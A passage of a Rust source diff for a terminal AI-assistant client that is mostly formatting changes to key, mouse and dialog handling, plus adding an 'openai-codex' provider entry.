-Move immutable borrow out of scope first, then take mutable. Good good good after fix.'", base),
+Move immutable borrow out of scope first, then take mutable. Good good good after fix.'",
+            base
+        ),
     }
 }
 
@@ -1084,10 +1531,12 @@ impl App {
             rustle_current_pose: crate::rustle::RustlePose::Default,
             rustle_pose_until: None,
             rustle_temp_pose: None,
-            rustle_next_blink: 200 + (std::time::SystemTime::now()
-                .duration_since(std::time::UNIX_EPOCH)
-                .unwrap_or_default()
-                .subsec_nanos() as u64 % 300),
+            rustle_next_blink: 200
+                + (std::time::SystemTime::now()
+                    .duration_since(std::time::UNIX_EPOCH)
+                    .unwrap_or_default()
+                    .subsec_nanos() as u64
+                    % 300),
             turn_start: None,
             last_turn_elapsed: None,
             last_turn_verb: None,
@@ -1128,7 +1577,8 @@ impl App {
             voice_mode_notice: crate::voice_mode_notice::VoiceModeNoticeState::new(),
             desktop_upsell: crate::desktop_upsell_startup::DesktopUpsellStartupState::new(),
             invalid_config_dialog: crate::invalid_config_dialog::InvalidConfigDialogState::new(),
-            memory_update_notification: crate::memory_update_notification::MemoryUpdateNotificationState::new(),
+            memory_update_notification:
+                crate::memory_update_notification::MemoryUpdateNotificationState::new(),
             elicitation: crate::elicitation_dialog::ElicitationDialogState::new(),
             model_picker: ModelPickerState::new(),
             session_browser: SessionBrowserState::new(),
@@ -1138,7 +1588,8 @@ impl App {
             context_viz: ContextVizState::new(),
             mcp_approval: McpApprovalDialogState::new(),
             go_to_line_dialog: GoToLineDialog::new(),
-            bypass_permissions_dialog: crate::bypass_permissions_dialog::BypassPermissionsDialogState::new(),
+            bypass_permissions_dialog:
+                crate::bypass_permissions_dialog::BypassPermissionsDialogState::new(),
             onboarding_dialog: crate::onboarding_dialog::OnboardingDialogState::new(),
             key_input_dialog: crate::key_input_dialog::KeyInputDialogState::new(),
             device_auth_dialog: crate::device_auth_dialog::DeviceAuthDialogState::new(),
@@ -1191,8 +1642,8 @@ impl App {
                     .map(|v| v == "1" || v.eq_ignore_ascii_case("true"))
                     .unwrap_or(false)
                     || {
-                        let path = claurst_core::config::Settings::config_dir()
-                            .join("ui-settings.json");
+                        let path =
+                            claurst_core::config::Settings::config_dir().join("ui-settings.json");
                         std::fs::read_to_string(&path)
                             .ok()
                             .and_then(|s| serde_json::from_str::<serde_json::Value>(&s).ok())
@@ -1409,7 +1860,12 @@ impl App {
         );
     }
 
-    fn activate_provider(&mut self, provider_id: String, provider_name: String, status_prefix: &str) {
+    fn activate_provider(
+        &mut self,
+        provider_id: String,
+        provider_name: String,
+        status_prefix: &str,
+    ) {
         let picker_title = provider_name.clone();
         self.fast_mode = false;
         self.set_provider_default(provider_id.clone());
@@ -1432,6 +1888,7 @@ impl App {
             let known = [
                 "anthropic",
                 "openai",
+                "openai-codex",
                 "google",
                 "groq",
                 "cerebras",
@@ -1503,7 +1960,9 @@ impl App {
         // Check if a temporary pose is active.
         if let Some(until) = self.rustle_pose_until {
             if std::time::Instant::now() < until {
-                self.rustle_current_pose = self.rustle_temp_pose.clone()
+                self.rustle_current_pose = self
+                    .rustle_temp_pose
+                    .clone()
                     .unwrap_or(crate::rustle::RustlePose::Default);
                 return;
             }
@@ -1515,9 +1974,8 @@ impl App {
         // Random eye-shift: every ~200-500 frames, briefly look right.
         if self.frame_count >= self.rustle_next_blink {
             self.rustle_temp_pose = Some(crate::rustle::RustlePose::LookRight);
-            self.rustle_pose_until = Some(
-                std::time::Instant::now() + std::time::Duration::from_millis(800)
-            );
+            self.rustle_pose_until =
+                Some(std::time::Instant::now() + std::time::Duration::from_millis(800));
             // Schedule next blink 200-500 frames from now (random-ish).
             let jitter = (self.frame_count.wrapping_mul(7) % 300) + 200;
             self.rustle_next_blink = self.frame_count + jitter;
@@ -1531,9 +1989,8 @@ impl App {
     /// Trigger Rustle looking down briefly (called on Tab / mode switch).
     pub fn rustle_look_down(&mut self) {
         self.rustle_temp_pose = Some(crate::rustle::RustlePose::LookDown);
-        self.rustle_pose_until = Some(
-            std::time::Instant::now() + std::time::Duration::from_secs(1)
-        );
+        self.rustle_pose_until =
+            Some(std::time::Instant::now() + std::time::Duration::from_secs(1));
     }
 
     /// Cycle to the next agent mode: build → plan → explore → build.
@@ -1593,7 +2050,8 @@ impl App {
     /// Update the context window size from the model registry for the current model.
     pub fn refresh_context_window_size(&mut self) {
         let provider = self.config.provider.as_deref().unwrap_or("anthropic");
-        let model_id = self.model_name
+        let model_id = self
+            .model_name
             .strip_prefix(&format!("{}/", provider))
             .unwrap_or(&self.model_name);
         if let Some(entry) = self.model_registry.get(provider, model_id) {
@@ -1772,14 +2230,22 @@ impl App {
             }
             "vim" => {
                 self.prompt_input.vim_enabled = !self.prompt_input.vim_enabled;
-                let status = if self.prompt_input.vim_enabled { "enabled" } else { "disabled" };
+                let status = if self.prompt_input.vim_enabled {
+                    "enabled"
+                } else {
+                    "disabled"
+                };
                 self.status_message = Some(format!("Vim mode {}.", status));
                 self.refresh_prompt_input();
                 true
             }
             "fast" => {
                 self.fast_mode = !self.fast_mode;
-                let status = if self.fast_mode { "enabled" } else { "disabled" };
+                let status = if self.fast_mode {
+                    "enabled"
+                } else {
+                    "disabled"
+                };
                 self.status_message = Some(format!("Fast mode {}.", status));
                 true
             }
@@ -1805,7 +2271,10 @@ impl App {
             }
             "copy" => {
                 // Copy last assistant message to clipboard. Attempt arboard; fall back to notification.
-                let last = self.messages.iter().rev()
+                let last = self
+                    .messages
+                    .iter()
+                    .rev()
                     .find(|m| m.role == Role::Assistant)
                     .map(|m| m.get_all_text());
                 if let Some(text) = last {
@@ -1820,7 +2289,10 @@ impl App {
                     } else {
                         self.notifications.push(
                             NotificationKind::Info,
-                            format!("Last response: {} chars (clipboard unavailable)", text.len()),
+                            format!(
+                                "Last response: {} chars (clipboard unavailable)",
+                                text.len()
+                            ),
                             Some(5),
                         );
                     }
@@ -1871,7 +2343,8 @@ impl App {
                     }
                     self.voice_recorder = Some(recorder);
                     self.voice_mode_notice = crate::voice_mode_notice::VoiceModeNoticeState::new();
-                    self.status_message = Some("Voice mode enabled. Press Alt+V to record.".to_string());
+                    self.status_message =
+                        Some("Voice mode enabled. Press Alt+V to record.".to_string());
                 }
                 true
             }
@@ -2179,8 +2652,7 @@ impl App {
             // Auto-scroll: keep offset at 0 so render shows the bottom.
             self.scroll_offset = 0;
         } else {
-            self.new_messages_while_scrolled =
-                self.new_messages_while_scrolled.saturating_add(1);
+            self.new_messages_while_scrolled = self.new_messages_while_scrolled.saturating_add(1);
         }
     }
 
@@ -2192,8 +2664,7 @@ impl App {
     /// Check current token usage and push token warning notifications as
     /// appropriate.  Call this after updating `token_count`.
     pub fn check_token_warnings(&mut self) {
-        let window =
-            claurst_query::context_window_for_model(&self.model_name) as u32;
+        let window = claurst_query::context_window_for_model(&self.model_name) as u32;
         if window == 0 {
             return;
         }
@@ -2244,7 +2715,8 @@ impl App {
     /// wheel) stay at the base 3-line step.
     fn scroll_step(&mut self) -> usize {
         let now = std::time::Instant::now();
-        let elapsed_ms = self.scroll_last_time
+        let elapsed_ms = self
+            .scroll_last_time
             .map(|t| now.duration_since(t).as_millis())
             .unwrap_or(u128::MAX);
         self.scroll_last_time = Some(now);
@@ -2341,7 +2813,8 @@ impl App {
                 }
             });
         }
-        self.status_message = Some("Recording\u{2026} release V or press Enter to transcribe".to_string());
+        self.status_message =
+            Some("Recording\u{2026} release V or press Enter to transcribe".to_string());
     }
 
     /// Stop PTT recording: flip the AtomicBool inside VoiceRecorder so the
@@ -2563,9 +3036,15 @@ impl App {
                     self.device_auth_dialog.close();
                     self.device_auth_pending = None;
                 }
-                _ if matches!(self.device_auth_dialog.status, crate::device_auth_dialog::DeviceAuthStatus::Success(_)) => {
+                _ if matches!(
+                    self.device_auth_dialog.status,
+                    crate::device_auth_dialog::DeviceAuthStatus::Success(_)
+                ) =>
+                {
                     // Any key after success -> store credential and close
-                    if let crate::device_auth_dialog::DeviceAuthStatus::Success(ref token) = self.device_auth_dialog.status {
+                    if let crate::device_auth_dialog::DeviceAuthStatus::Success(ref token) =
+                        self.device_auth_dialog.status
+                    {
                         let provider_id = self.device_auth_dialog.provider_id.clone();
                         let provider_name = self.device_auth_dialog.provider_name.clone();
                         let token = token.clone();
@@ -2578,17 +3057,18 @@ impl App {
                         } else {
                             claurst_core::StoredCredential::ApiKey { key: token }
                         };
-                        self.auth_store.set(
-                            &provider_id,
-                            credential,
-                        );
+                        self.auth_store.set(&provider_id, credential);
                         self.device_auth_pending = None;
                         self.device_auth_dialog.close();
                         self.activate_provider(provider_id, provider_name, "Connected to");
                         return false;
                     }
                 }
-                _ if matches!(self.device_auth_dialog.status, crate::device_auth_dialog::DeviceAuthStatus::Error(_)) => {
+                _ if matches!(
+                    self.device_auth_dialog.status,
+                    crate::device_auth_dialog::DeviceAuthStatus::Error(_)
+                ) =>
+                {
                     // Any key after error -> close
                     self.device_auth_dialog.close();
                     self.device_auth_pending = None;
@@ -2630,15 +3110,33 @@ impl App {
         // Connect-a-provider dialog (/connect command)
         if self.connect_dialog.visible {
             match key.code {
-                KeyCode::Esc => { self.connect_dialog.close(); }
-                KeyCode::Home => { self.connect_dialog.move_home(); }
-                KeyCode::End => { self.connect_dialog.move_end(); }
-                KeyCode::Up => { self.connect_dialog.move_up(); }
-                KeyCode::Down => { self.connect_dialog.move_down(); }
-                KeyCode::PageUp => { self.connect_dialog.page_up(); }
-                KeyCode::PageDown => { self.connect_dialog.page_down(); }
-                KeyCode::Char('p') if key.modifiers.contains(KeyModifiers::CONTROL) => { self.connect_dialog.move_up(); }
-                KeyCode::Char('n') if key.modifiers.contains(KeyModifiers::CONTROL) => { self.connect_dialog.move_down(); }
+                KeyCode::Esc => {
+                    self.connect_dialog.close();
+                }
+                KeyCode::Home => {
+                    self.connect_dialog.move_home();
+                }
+                KeyCode::End => {
+                    self.connect_dialog.move_end();
+                }
+                KeyCode::Up => {
+                    self.connect_dialog.move_up();
+                }
+                KeyCode::Down => {
+                    self.connect_dialog.move_down();
+                }
+                KeyCode::PageUp => {
+                    self.connect_dialog.page_up();
+                }
+                KeyCode::PageDown => {
+                    self.connect_dialog.page_down();
+                }
+                KeyCode::Char('p') if key.modifiers.contains(KeyModifiers::CONTROL) => {
+                    self.connect_dialog.move_up();
+                }
+                KeyCode::Char('n') if key.modifiers.contains(KeyModifiers::CONTROL) => {
+                    self.connect_dialog.move_down();
+                }
                 KeyCode::Enter => {
                     if let Some(selected) = self.connect_dialog.selected().cloned() {
                         self.connect_dialog.close();
@@ -2646,21 +3144,28 @@ impl App {
                         match selected.id.as_str() {
                             // Local providers — activate immediately, no key needed
                             "ollama" | "lmstudio" | "llamacpp" => {
-                                self.activate_provider(selected.id.clone(), selected.title.clone(), "Switched to");
+                                self.activate_provider(
+                                    selected.id.clone(),
+                                    selected.title.clone(),
+                                    "Switched to",
+                                );
                             }
                             "anthropic" => {
                                 // Anthropic: use API key from console.anthropic.com
                                 // (OAuth requires a registered app which Claurst doesn't have)
-                                self.key_input_dialog.open(selected.id.clone(), selected.title.clone());
+                                self.key_input_dialog
+                                    .open(selected.id.clone(), selected.title.clone());
                             }
                             "github-copilot" => {
                                 // GitHub Copilot: device code flow
-                                self.device_auth_dialog.open(selected.id.clone(), selected.title.clone());
+                                self.device_auth_dialog
+                                    .open(selected.id.clone(), selected.title.clone());
                                 self.device_auth_pending = Some("github-copilot".to_string());
                             }
                             "openai-codex" => {
                                 // OpenAI Codex: browser OAuth flow (spawned by main loop)
-                                self.device_auth_dialog.open("openai-codex".into(), "OpenAI Codex".into());
+                                self.device_auth_dialog
+                                    .open("openai-codex".into(), "OpenAI Codex".into());
                                 self.device_auth_pending = Some("openai-codex".to_string());
                             }
                             // AWS Bedrock — accept a bearer token via key input dialog
@@ -2676,8 +3181,12 @@ impl App {
                         }
                     }
                 }
-                KeyCode::Backspace => { self.connect_dialog.filter_pop(); }
-                KeyCode::Char(c) => { self.connect_dialog.filter_push(c); }
+                KeyCode::Backspace => {
+                    self.connect_dialog.filter_pop();
+                }
+                KeyCode::Char(c) => {
+                    self.connect_dialog.filter_push(c);
+                }
                 _ => {}
             }
             return false;
@@ -2686,15 +3195,33 @@ impl App {
         // Command palette (Ctrl+K)
         if self.command_palette.visible {
             match key.code {
-                KeyCode::Esc => { self.command_palette.close(); }
-                KeyCode::Home => { self.command_palette.move_home(); }
-                KeyCode::End => { self.command_palette.move_end(); }
-                KeyCode::Up => { self.command_palette.move_up(); }
-                KeyCode::Down => { self.command_palette.move_down(); }
-                KeyCode::PageUp => { self.command_palette.page_up(); }
-                KeyCode::PageDown => { self.command_palette.page_down(); }
-                KeyCode::Char('p') if key.modifiers.contains(KeyModifiers::CONTROL) => { self.command_palette.move_up(); }
-                KeyCode::Char('n') if key.modifiers.contains(KeyModifiers::CONTROL) => { self.command_palette.move_down(); }
+                KeyCode::Esc => {
+                    self.command_palette.close();
+                }
+                KeyCode::Home => {
+                    self.command_palette.move_home();
+                }
+                KeyCode::End => {
+                    self.command_palette.move_end();
+                }
+                KeyCode::Up => {
+                    self.command_palette.move_up();
+                }
+                KeyCode::Down => {
+                    self.command_palette.move_down();
+                }
+                KeyCode::PageUp => {
+                    self.command_palette.page_up();
+                }
+                KeyCode::PageDown => {
+                    self.command_palette.page_down();
+                }
+                KeyCode::Char('p') if key.modifiers.contains(KeyModifiers::CONTROL) => {
+                    self.command_palette.move_up();
+                }
+                KeyCode::Char('n') if key.modifiers.contains(KeyModifiers::CONTROL) => {
+                    self.command_palette.move_down();
+                }
                 KeyCode::Enter => {
                     if let Some(selected) = self.command_palette.selected().cloned() {
                         self.command_palette.close();
@@ -2703,8 +3230,12 @@ impl App {
                         return true; // signal to submit this as input
                     }
                 }
-                KeyCode::Backspace => { self.command_palette.filter_pop(); }
-                KeyCode::Char(c) => { self.command_palette.filter_push(c); }
+                KeyCode::Backspace => {
+                    self.command_palette.filter_pop();
+                }
+                KeyCode::Char(c) => {
+                    self.command_palette.filter_push(c);
+                }
                 _ => {}
             }
             return false;
@@ -2731,8 +3262,12 @@ impl App {
                 KeyCode::Down => self.model_picker.select_next(),
                 KeyCode::Left => self.model_picker.effort_prev(),
                 KeyCode::Right => self.model_picker.effort_next(),
-                KeyCode::Char('p') if key.modifiers.contains(KeyModifiers::CONTROL) => self.model_picker.select_prev(),
-                KeyCode::Char('n') if key.modifiers.contains(KeyModifiers::CONTROL) => self.model_picker.select_next(),
+                KeyCode::Char('p') if key.modifiers.contains(KeyModifiers::CONTROL) => {
+                    self.model_picker.select_prev()
+                }
+                KeyCode::Char('n') if key.modifiers.contains(KeyModifiers::CONTROL) => {
+                    self.model_picker.select_next()
+                }
                 KeyCode::Enter => {
                     if let Some((model_id, effort)) = self.model_picker.confirm() {
                         // If user picked a model other than the fast-mode model
@@ -2753,7 +3288,9 @@ impl App {
                         };
                         self.set_model(full_model.clone());
                         self.persist_provider_and_model();
-                        let effort_hint = effort.map(|e| format!(" [{}]", e.label())).unwrap_or_default();
+                        let effort_hint = effort
+                            .map(|e| format!(" [{}]", e.label()))
+                            .unwrap_or_default();
                         self.status_message = Some(format!("Model: {}{}", full_model, effort_hint));
                     }
                 }
@@ -2768,47 +3305,43 @@ impl App {
         if self.session_branching.visible {
             use crate::session_branching::BranchBrowserMode;
             match self.session_branching.mode {
-                BranchBrowserMode::Browse => {
-                    match key.code {
-                        KeyCode::Esc => self.session_branching.cancel(),
-                        KeyCode::Up => self.session_branching.select_prev(),
-                        KeyCode::Down => self.session_branching.select_next(),
-                        KeyCode::Char('n') => self.session_branching.start_create_new(),
-                        KeyCode::Char('d') => self.session_branching.start_delete_confirm(),
-                        KeyCode::Enter => {
-                            if let Some(branch) = self.session_branching.selected_branch() {
-                                self.status_message = Some(format!("Switched to branch: {}", branch.name));
-                                self.session_branching.close();
-                            }
+                BranchBrowserMode::Browse => match key.code {
+                    KeyCode::Esc => self.session_branching.cancel(),
+                    KeyCode::Up => self.session_branching.select_prev(),
+                    KeyCode::Down => self.session_branching.select_next(),
+                    KeyCode::Char('n') => self.session_branching.start_create_new(),
+                    KeyCode::Char('d') => self.session_branching.start_delete_confirm(),
+                    KeyCode::Enter => {
+                        if let Some(branch) = self.session_branching.selected_branch() {
+                            self.status_message =
+                                Some(format!("Switched to branch: {}", branch.name));
+                            self.session_branching.close();
                         }
-                        _ => {}
                     }
-                }
-                BranchBrowserMode::CreateNew => {
-                    match key.code {
-                        KeyCode::Esc => self.session_branching.cancel(),
-                        KeyCode::Enter => {
-                            if let Some((name, at_msg)) = self.session_branching.confirm_create_new() {
-                                self.status_message = Some(format!("Created branch: {} at message {}", name, at_msg));
-                                self.session_branching.close();
-                            }
+                    _ => {}
+                },
+                BranchBrowserMode::CreateNew => match key.code {
+                    KeyCode::Esc => self.session_branching.cancel(),
+                    KeyCode::Enter => {
+                        if let Some((name, at_msg)) = self.session_branching.confirm_create_new() {
+                            self.status_message =
+                                Some(format!("Created branch: {} at message {}", name, at_msg));
+                            self.session_branching.close();
                         }
-                        KeyCode::Backspace => self.session_branching.pop_create_char(),
-                        KeyCode::Char(c) => self.session_branching.push_create_char(c),
-                        _ => {}
                     }
-                }
-                BranchBrowserMode::ConfirmDelete => {
-                    match key.code {
-                        KeyCode::Esc | KeyCode::Char('n') => self.session_branching.cancel(),
-                        KeyCode::Enter | KeyCode::Char('y') => {
-                            if let Some(branch_id) = self.session_branching.confirm_delete() {
-                                self.status_message = Some(format!("Deleted branch: {}", branch_id));
-                            }
+                    KeyCode::Backspace => self.session_branching.pop_create_char(),
+                    KeyCode::Char(c) => self.session_branching.push_create_char(c),
+                    _ => {}
+                },
+                BranchBrowserMode::ConfirmDelete => match key.code {
+                    KeyCode::Esc | KeyCode::Char('n') => self.session_branching.cancel(),
+                    KeyCode::Enter | KeyCode::Char('y') => {
+                        if let Some(branch_id) = self.session_branching.confirm_delete() {
+                            self.status_message = Some(format!("Deleted branch: {}", branch_id));
                         }
-                        _ => {}
                     }
-                }
+                    _ => {}
+                },
             }
             return false;
         }
@@ -2817,38 +3350,32 @@ impl App {
         if self.session_browser.visible {
             use crate::session_browser::SessionBrowserMode;
             match self.session_browser.mode {
-                SessionBrowserMode::Browse => {
-                    match key.code {
-                        KeyCode::Esc => self.session_browser.close(),
-                        KeyCode::Up => self.session_browser.select_prev(),
-                        KeyCode::Down => self.session_browser.select_next(),
-                        KeyCode::Char('r') => self.session_browser.start_rename(),
-                        _ => {}
-                    }
-                }
-                SessionBrowserMode::Rename => {
-                    match key.code {
-                        KeyCode::Esc => self.session_browser.cancel(),
-                        KeyCode::Enter => {
-                            if let Some((_id, name)) = self.session_browser.confirm_rename() {
-                                self.session_title = Some(name.clone());
-                                self.status_message = Some(format!("Renamed to: {}", name));
-                            }
+                SessionBrowserMode::Browse => match key.code {
+                    KeyCode::Esc => self.session_browser.close(),
+                    KeyCode::Up => self.session_browser.select_prev(),
+                    KeyCode::Down => self.session_browser.select_next(),
+                    KeyCode::Char('r') => self.session_browser.start_rename(),
+                    _ => {}
+                },
+                SessionBrowserMode::Rename => match key.code {
+                    KeyCode::Esc => self.session_browser.cancel(),
+                    KeyCode::Enter => {
+                        if let Some((_id, name)) = self.session_browser.confirm_rename() {
+                            self.session_title = Some(name.clone());
+                            self.status_message = Some(format!("Renamed to: {}", name));
                         }
-                        KeyCode::Backspace => self.session_browser.pop_rename_char(),
-                        KeyCode::Char(c) => self.session_browser.push_rename_char(c),
-                        _ => {}
                     }
-                }
-                SessionBrowserMode::Confirm => {
-                    match key.code {
-                        KeyCode::Esc | KeyCode::Char('n') => self.session_browser.cancel(),
-                        KeyCode::Enter | KeyCode::Char('y') => {
-                            self.session_browser.close();
-                        }
-                        _ => {}
+                    KeyCode::Backspace => self.session_browser.pop_rename_char(),
+                    KeyCode::Char(c) => self.session_browser.push_rename_char(c),
+                    _ => {}
+                },
+                SessionBrowserMode::Confirm => match key.code {
+                    KeyCode::Esc | KeyCode::Char('n') => self.session_browser.cancel(),
+                    KeyCode::Enter | KeyCode::Char('y') => {
+                        self.session_browser.close();
                     }
-                }
+                    _ => {}
+                },
             }
             return false;
         }
@@ -2860,7 +3387,9 @@ impl App {
                 KeyCode::Up => self.tasks_overlay.select_prev(),
                 KeyCode::Down => self.tasks_overlay.select_next(),
                 KeyCode::Enter => {
-                    if let Some((task_id, new_status)) = self.tasks_overlay.cycle_and_persist_status() {
+                    if let Some((task_id, new_status)) =
+                        self.tasks_overlay.cycle_and_persist_status()
+                    {
                         self.status_message = Some(format!("Task {} → {}", task_id, new_status));
                     }
                 }
@@ -3161,7 +3690,8 @@ impl App {
         }
 
         // Clear any active text selection on key press (except Ctrl+C which copies it).
-        let is_copy = key.code == KeyCode::Char('c') && key.modifiers.contains(KeyModifiers::CONTROL);
+        let is_copy =
+            key.code == KeyCode::Char('c') && key.modifiers.contains(KeyModifiers::CONTROL);
         if !is_copy && self.selection_anchor.is_some() {
             self.selection_anchor = None;
             self.selection_focus = None;
@@ -3260,7 +3790,8 @@ impl App {
                 } else {
                     format!("Image attached: {}", label)
                 };
-                self.notifications.push(NotificationKind::Info, msg, Some(3));
+                self.notifications
+                    .push(NotificationKind::Info, msg, Some(3));
             } else if let Some(text) = read_clipboard_text() {
                 self.prompt_input.paste(&text);
             }
@@ -3268,10 +3799,7 @@ impl App {
         }
 
         // ---- Enter while PTT recording: stop capture instead of submitting ----
-        if key.code == KeyCode::Enter
-            && self.voice_recording
-            && self.voice_recorder.is_some()
-        {
+        if key.code == KeyCode::Enter && self.voice_recording && self.voice_recorder.is_some() {
             self.handle_voice_ptt_stop();
             return false;
         }
@@ -3289,8 +3817,9 @@ impl App {
                 KeyCode::PageUp | KeyCode::PageDown => {
                     // Let these fall through to the normal scroll handling below.
                 }
-                KeyCode::Char(_) if !key.modifiers.contains(KeyModifiers::CONTROL)
-                    && !key.modifiers.contains(KeyModifiers::ALT) =>
+                KeyCode::Char(_)
+                    if !key.modifiers.contains(KeyModifiers::CONTROL)
+                        && !key.modifiers.contains(KeyModifiers::ALT) =>
                 {
                     // Printable char: switch focus to Input and process normally.
                     self.focus = FocusTarget::Input;
@@ -3310,7 +3839,11 @@ impl App {
                     self.selection_focus = None;
                     *self.selection_text.borrow_mut() = String::new();
                     if copied {
-                        self.notifications.push(NotificationKind::Info, "Copied to clipboard".to_string(), Some(2));
+                        self.notifications.push(
+                            NotificationKind::Info,
+                            "Copied to clipboard".to_string(),
+                            Some(2),
+                        );
                     }
                 } else if self.is_streaming {
                     self.is_streaming = false;
@@ -3365,25 +3898,35 @@ impl App {
                 self.help_overlay.toggle();
             }
 
-            KeyCode::Char('u') if key.modifiers.contains(KeyModifiers::CONTROL) && !self.is_streaming => {
+            KeyCode::Char('u')
+                if key.modifiers.contains(KeyModifiers::CONTROL) && !self.is_streaming =>
+            {
                 self.prompt_input.kill_line_backward();
                 self.refresh_prompt_input();
             }
-            KeyCode::Char('w') if key.modifiers.contains(KeyModifiers::CONTROL) && !self.is_streaming => {
+            KeyCode::Char('w')
+                if key.modifiers.contains(KeyModifiers::CONTROL) && !self.is_streaming =>
+            {
                 self.prompt_input.kill_word_backward();
                 self.refresh_prompt_input();
             }
-            KeyCode::Char('y') if key.modifiers.contains(KeyModifiers::CONTROL) && !self.is_streaming => {
+            KeyCode::Char('y')
+                if key.modifiers.contains(KeyModifiers::CONTROL) && !self.is_streaming =>
+            {
                 self.prompt_input.yank();
                 self.refresh_prompt_input();
             }
 
             // ---- Alt/Meta key text editing operations -------------------
-            KeyCode::Char('y') if key.modifiers.contains(KeyModifiers::ALT) && !self.is_streaming => {
+            KeyCode::Char('y')
+                if key.modifiers.contains(KeyModifiers::ALT) && !self.is_streaming =>
+            {
                 self.prompt_input.yank_pop();
                 self.refresh_prompt_input();
             }
-            KeyCode::Backspace if key.modifiers.contains(KeyModifiers::ALT) && !self.is_streaming => {
+            KeyCode::Backspace
+                if key.modifiers.contains(KeyModifiers::ALT) && !self.is_streaming =>
+            {
                 self.prompt_input.delete_word_backward();
                 self.refresh_prompt_input();
             }
@@ -3391,15 +3934,21 @@ impl App {
                 self.prompt_input.delete_word_forward();
                 self.refresh_prompt_input();
             }
-            KeyCode::Char('b') if key.modifiers.contains(KeyModifiers::ALT) && !self.is_streaming => {
+            KeyCode::Char('b')
+                if key.modifiers.contains(KeyModifiers::ALT) && !self.is_streaming =>
+            {
                 self.prompt_input.move_word_backward();
                 self.sync_legacy_prompt_fields();
             }
-            KeyCode::Char('f') if key.modifiers.contains(KeyModifiers::ALT) && !self.is_streaming => {
+            KeyCode::Char('f')
+                if key.modifiers.contains(KeyModifiers::ALT) && !self.is_streaming =>
+            {
                 self.prompt_input.move_word_forward();
                 self.sync_legacy_prompt_fields();
             }
-            KeyCode::Char('d') if key.modifiers.contains(KeyModifiers::ALT) && !self.is_streaming => {
+            KeyCode::Char('d')
+                if key.modifiers.contains(KeyModifiers::ALT) && !self.is_streaming =>
+            {
                 self.prompt_input.delete_word_at_cursor();
                 self.refresh_prompt_input();
             }
@@ -3508,7 +4057,9 @@ impl App {
 
             // ---- Input history navigation ------------------------------
             KeyCode::Up => {
-                if !self.prompt_input.suggestions.is_empty() && self.prompt_input.text.starts_with('/') {
+                if !self.prompt_input.suggestions.is_empty()
+                    && self.prompt_input.text.starts_with('/')
+                {
                     self.prompt_input.suggestion_prev();
                 } else if !self.prompt_input.history.is_empty() {
                     self.prompt_input.history_up();
@@ -3516,7 +4067,9 @@ impl App {
                 self.refresh_prompt_input();
             }
             KeyCode::Down => {
-                if !self.prompt_input.suggestions.is_empty() && self.prompt_input.text.starts_with('/') {
+                if !self.prompt_input.suggestions.is_empty()
+                    && self.prompt_input.text.starts_with('/')
+                {
                     self.prompt_input.suggestion_next();
                 } else if self.prompt_input.history_pos.is_some() {
                     self.prompt_input.history_down();
@@ -4143,7 +4696,7 @@ impl App {
                         self.refresh_prompt_input();
                     } else if self.prompt_input.is_empty() {
                         self.cycle_agent_mode();
-                    self.rustle_look_down();
+                        self.rustle_look_down();
                     }
                 }
                 false
@@ -4305,7 +4858,8 @@ impl App {
             (Some(last_time), Some(last_pos)) => {
                 let elapsed = now.duration_since(last_time);
                 let distance = ((current_pos.0 as i32 - last_pos.0 as i32).abs()
-                    + (current_pos.1 as i32 - last_pos.1 as i32).abs()) as u16;
+                    + (current_pos.1 as i32 - last_pos.1 as i32).abs())
+                    as u16;
                 elapsed.as_millis() < 500 && distance <= 5
             }
             _ => false,
@@ -4335,7 +4889,10 @@ impl App {
     fn find_line_boundaries(&self, row: u16) -> Option<(u16, u16)> {
         let selectable_area = self.last_selectable_area.get();
         let line_start = selectable_area.y;
-        let line_end = selectable_area.y.saturating_add(selectable_area.height).saturating_sub(1);
+        let line_end = selectable_area
+            .y
+            .saturating_add(selectable_area.height)
+            .saturating_sub(1);
 
         if row >= line_start && row <= line_end {
             Some((row, row))
@@ -4453,9 +5010,12 @@ impl App {
             ContextMenuItem::Fork => {
                 if let ContextMenuKind::Message { message_index } = kind {
                     let branch_point = message_index + 1;
-                    self.prompt_input.replace_text(format!("/fork {}", branch_point));
-                    self.status_message =
-                        Some(format!("Fork at message {} - press Enter to confirm", branch_point));
+                    self.prompt_input
+                        .replace_text(format!("/fork {}", branch_point));
+                    self.status_message = Some(format!(
+                        "Fork at message {} - press Enter to confirm",
+                        branch_point
+                    ));
                 }
             }
         }
@@ -4471,15 +5031,29 @@ impl App {
         if matches!(mouse_event.kind, MouseEventKind::Moved) {
             if let Some(menu) = self.context_menu_state.as_mut() {
                 let items = Self::context_menu_items(menu.kind);
-                let item_labels: Vec<&str> = items.iter().map(|i| match i {
-                    ContextMenuItem::Copy => "Copy",
-                    ContextMenuItem::Fork => "Fork new chat",
-                }).collect();
-                let menu_width = (item_labels.iter().map(|l| l.len()).max().unwrap_or(4) + 4) as u16;
+                let item_labels: Vec<&str> = items
+                    .iter()
+                    .map(|i| match i {
+                        ContextMenuItem::Copy => "Copy",
+                        ContextMenuItem::Fork => "Fork new chat",
+                    })
+                    .collect();
+                let menu_width =
+                    (item_labels.iter().map(|l| l.len()).max().unwrap_or(4) + 4) as u16;
                 let menu_height = items.len() as u16 + 2;
                 let screen = self.last_msg_area.get();
-                let menu_x = menu.x.min(screen.x.saturating_add(screen.width).saturating_sub(menu_width + 1));
-                let menu_y = menu.y.min(screen.y.saturating_add(screen.height).saturating_sub(menu_height + 1));
+                let menu_x = menu.x.min(
+                    screen
+                        .x
+                        .saturating_add(screen.width)
+                        .saturating_sub(menu_width + 1),
+                );
+                let menu_y = menu.y.min(
+                    screen
+                        .y
+                        .saturating_add(screen.height)
+                        .saturating_sub(menu_height + 1),
+                );
                 let inner_y = menu_y + 1;
                 let col = mouse_event.column;
                 let row = mouse_event.row;
@@ -4514,9 +5088,11 @@ impl App {
                 MouseEventKind::Down(MouseButton::Left) => {
                     // DialogSelect dialogs — check if click is inside for item selection
                     let in_dialog = if self.connect_dialog.visible {
-                        self.connect_dialog.contains(mouse_event.column, mouse_event.row)
+                        self.connect_dialog
+                            .contains(mouse_event.column, mouse_event.row)
                     } else if self.command_palette.visible {
-                        self.command_palette.contains(mouse_event.column, mouse_event.row)
+                        self.command_palette
+                            .contains(mouse_event.column, mouse_event.row)
                     } else {
                         // Other dialogs (model_picker, settings, export, etc.) —
                         // treat any click as "inside" to prevent accidental dismiss.
@@ -4540,12 +5116,18 @@ impl App {
                 }
                 MouseEventKind::ScrollUp => {
                     // Scroll through dialog items
-                    if self.connect_dialog.visible { self.connect_dialog.move_up(); }
-                    else if self.command_palette.visible { self.command_palette.move_up(); }
+                    if self.connect_dialog.visible {
+                        self.connect_dialog.move_up();
+                    } else if self.command_palette.visible {
+                        self.command_palette.move_up();
+                    }
                 }
